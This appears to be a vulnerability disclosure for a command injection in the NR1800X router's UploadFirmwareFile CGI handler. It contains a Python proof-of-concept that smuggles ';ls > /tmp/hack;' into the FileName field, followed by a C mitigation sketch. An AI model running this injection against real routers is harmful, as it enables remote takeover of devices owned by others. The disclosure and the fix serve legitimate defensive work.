Hi, we found a command injection vulnerability in the **NR1800X** (firmware version V9.1.0u.6279_B20210910) and are contacting you at the first opportunity.

The bug is in the function UploadFirmwareFile in /cgi-bin/cstecgi.cgi. The attacker-controlled FileName parameter is copied directly into a doSystem call, resulting in a command injection vulnerability.


PoC

```python
import requests

url = "http://192.168.17.220:80/cgi-bin/cstecgi.cgi"
cookie = {"Cookie": "uid=1234"}
data = {'topicurl': "UploadFirmwareFile", "FileName": ";ls > /tmp/hack;"}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)
```

Impact

Remote code execution

After executing the PoC, we can see that /tmp/hack is created.
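A mitigation sketch for the FileName-to-doSystem flow described above, added here as an example and not taken from the firmware or from this report: the handler allowlists the characters of FileName and passes it as a separate argument vector entry instead of splicing it into a shell command line. The function names, the 64-byte limit and the `/bin/fw_check` program path are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical validator for the FileName parameter (the firmware's real
 * code is not shown in the report). Accepts only a plain basename made of
 * [A-Za-z0-9._-], so no shell metacharacter or path separator gets through. */
int filename_is_safe(const char *name)
{
    size_t len, i;

    if (name == NULL || (len = strlen(name)) == 0 || len > 64) /* assumed limit */
        return 0;
    if (name[0] == '.' || name[0] == '-')  /* no dotfiles, "..", or option-like names */
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* Fills an argument vector for an exec-style call, so the name is never
 * parsed by a shell. Returns 0 on success, -1 if the name is rejected.
 * "/bin/fw_check" is a placeholder program path, not from the firmware. */
int build_argv(const char *name, const char *argv[3])
{
    if (!filename_is_safe(name))
        return -1;
    argv[0] = "/bin/fw_check";
    argv[1] = name;
    argv[2] = NULL;
    return 0;
}

int main(void)
{
    /* Constructed inputs: a benign name and the FileName value from the PoC. */
    const char *samples[] = { "firmware_v9.bin", ";ls > /tmp/hack;" };
    const char *argv[3];
    size_t i;

    for (i = 0; i < 2; i++)
        printf("%-20s -> %s\n", samples[i],
               build_argv(samples[i], argv) == 0 ? "accepted" : "rejected");
    return 0;
}
```

The resulting vector is meant for `execv` in a forked child; validation alone still leaves the value inside a shell string if the call site keeps using doSystem.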
